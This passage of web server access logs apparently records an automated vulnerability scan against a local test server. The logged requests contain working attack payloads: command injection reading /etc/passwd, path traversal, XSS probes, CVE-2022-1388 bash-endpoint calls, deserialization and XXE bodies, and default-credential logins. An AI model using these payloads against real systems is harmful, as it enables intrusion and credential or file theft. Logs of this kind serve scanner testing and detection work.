AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ovirt-engine/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0A/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd>../../297Mdv2zFgmZJiGg8hDdMbEVqxA.txt&id=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"user=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/bin/sqlnet.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfide/componentutils/login.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/airflow/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /assets/php/profile.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /search.htm?searchstring2=&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.196","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///example.com@/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.201","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /297Mdv2zFgmZJiGg8hDdMbEVqxA.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"\xAC\xED\x00\x05sr\x00\x13java.util.ArrayListx\x81\xD2\x1D\x99\xC7a\x9D\x03\x00\x01I\x00\x04sizexp\x00\x00\x00\x02w\x04\x00\x00\x00\x02t\x00\x09element 1t\x00\x09element 2x","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /invoker/JMXInvokerServlet/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.047","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /vendor/qcubed/qcubed/assets/php/profile.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.idea/deployment.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"user=admin&passwd=admin&challengePwd=&ok=Login","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /php/login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /KeepAlive.jsp?stamp=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword=\x22onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.idea/workspace.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ew5px3=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"\x0D\x0A\x0D\x0A\x0D\x0A]>\x0D\x0A\x0D\x0A&xxe;\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /lumis/portal/controller/xml/PageControllerXml.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"{\x0D\x0A \x22command\x22: \x22run\x22,\x0D\x0A \x22utilCmdArgs\x22: \x22-c 'echo CVE-2022-1388 | rev'\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /mgmt/tm/util/bash HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.178","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /doc/page/login.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /storia_soldi.php?piu17%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ee3esq=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"{\x0D\x0A \x22command\x22: \x22run\x22,\x0D\x0A \x22utilCmdArgs\x22: \x22-c 'echo CVE-2022-1388 | rev'\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"localhost","request":"POST /mgmt/tm/util/bash HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wp_nlm=confirmation&appurl=aHR0cDovL2F0dGFja2VyLmNvbQ== HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login?redir=http://www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tabella.php?jkuh3%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Eyql8b=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"username=guacadmin&password=guacadmin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/tokens HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.180","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.178","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /guest/users/forgotten?email=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ef9xkbujgt24&form_availability_calendar_template=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/status/flags HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"","request":"GET /etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /desktopmodules/dnnwerk.radeditorprovider/dialoghandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v2/_catalog HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.182","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /asdf.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.171","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /editor/ckeditor/samples/sample_posteddata.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.172","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"phps_query=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /search HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fck/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/vropspluginui/rest/services/getstatus HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/targets HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.173","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellcheckder.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpversion.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": 